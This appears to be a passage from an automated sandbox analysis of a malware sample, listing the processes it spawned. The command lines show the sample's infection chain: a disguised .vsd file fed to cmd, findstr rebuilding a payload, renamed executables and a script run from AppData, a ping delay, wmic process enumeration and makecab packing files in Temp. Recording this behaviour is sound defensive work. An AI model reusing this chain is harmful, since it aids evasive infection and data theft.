                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:50:25
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\cmd.exe' /c CmD < Poi.vsd
                                                  Imagebase:0x2a0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:10:50:27
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff61de10000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:10:50:30
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:CmD
                                                  Imagebase:0x2a0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:10:50:35
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd
                                                  Imagebase:0xe00000
                                                  File size:29696 bytes
                                                  MD5 hash:8B534A7FC0630DE41BB1F98C882C19EC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:50:36
                                                  Start date:08/04/2021
                                                  Path:C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
                                                  Wow64 process (32bit):true
                                                  Commandline:Gia.exe.com D
                                                  Imagebase:0x7ff6c59a0000
                                                  File size:943784 bytes
                                                  MD5 hash:78BA0653A340BAC5FF152B21A83626CC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:50:37
                                                  Start date:08/04/2021
                                                  Path:C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com D
                                                  Imagebase:0x8b0000
                                                  File size:943784 bytes
                                                  MD5 hash:78BA0653A340BAC5FF152B21A83626CC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:50:38
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping 127.0.0.1 -n 30
                                                  Imagebase:0x230000
                                                  File size:18944 bytes
                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:10:50:49
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\zPgFqFUsML\wAYZqHgYEOdcYU.js'
                                                  Imagebase:0x7ff7e13f0000
                                                  File size:163840 bytes
                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:10:50:51
                                                  Start date:08/04/2021
                                                  Path:C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com C:\Users\user\AppData\Roaming\zPgFqFUsML\I
                                                  Imagebase:0x220000
                                                  File size:943784 bytes
                                                  MD5 hash:78BA0653A340BAC5FF152B21A83626CC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 3%, Metadefender, Browse
                                                  • Detection: 2%, ReversingLabs
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:51:03
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\nslookup.exe
                                                  Wow64 process (32bit):
                                                  Commandline:C:\Windows\SysWOW64\nslookup.exe
                                                  Imagebase:
                                                  File size:78336 bytes
                                                  MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:51:18
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\nslookup.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\nslookup.exe
                                                  Imagebase:0x3f0000
                                                  File size:78336 bytes
                                                  MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:51:51
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd.exe /C ver > 'C:\Users\user\AppData\Local\Temp\chrCF8.tmp'
                                                  Imagebase:0x2a0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:10:51:51
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff61de10000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:10:51:52
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd.exe /C wmic process get Name > 'C:\Users\user\AppData\Local\Temp\chr1073.tmp'
                                                  Imagebase:0x2a0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:10:51:52
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff61de10000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:10:51:53
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:wmic process get Name
                                                  Imagebase:0xf10000
                                                  File size:391680 bytes
                                                  MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:10:51:57
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
                                                  Imagebase:0x2a0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:10:51:57
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff61de10000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:10:51:57
                                                  Start date:08/04/2021
                                                  Path:C:\Windows\SysWOW64\makecab.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
                                                  Imagebase:0x1360000
                                                  File size:68608 bytes
                                                  MD5 hash:D0D74264402D9F402615F22258330EC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >